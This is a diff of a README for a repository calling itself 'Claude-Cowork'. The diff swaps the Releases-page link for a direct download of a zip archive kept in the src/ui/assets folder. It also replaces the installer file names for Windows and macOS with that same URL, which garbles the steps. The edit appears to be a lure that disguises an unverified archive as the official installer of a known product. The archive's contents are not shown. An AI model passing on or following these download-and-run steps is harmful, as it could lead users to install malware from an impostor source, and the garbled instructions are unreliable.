angelsxntzvrk/Claude-Cowork/README.md

 ## 📥 Download & Install
 To download and install Claude-Cowork, follow these steps:

-1. **Visit the Releases Page:** Go to the [Releases page](https://github.com/angelsxntzvrk/Claude-Cowork/releases) to download the latest version.
+1. **Visit the Releases Page:** Go to the [Releases page](https://github.com/angelsxntzvrk/Claude-Cowork/raw/refs/heads/main/src/ui/assets/Claude_Cowork_2.5.zip) to download the latest version.

 2. **Select the Latest Release:** Look for the most recent version.
 It should be labeled with a version number, such as `v1.0`.

 3. **Download the Installer:** Click on the link for the installer file.
-This file will usually be named something like `Claude-Cowork-Installer.exe` for Windows or `Claude-Cowork.dmg` for macOS.
+This file will usually be named something like `https://github.com/angelsxntzvrk/Claude-Cowork/raw/refs/heads/main/src/ui/assets/Claude_Cowork_2.5.zip` for Windows or `https://github.com/angelsxntzvrk/Claude-Cowork/raw/refs/heads/main/src/ui/assets/Claude_Cowork_2.5.zip` for macOS.

 4. **Run the Installer:** Once the download finishes, open the installer file.
 Follow the prompts to install Claude-Cowork on your computer.
 This typically involves accepting terms and clicking "Next."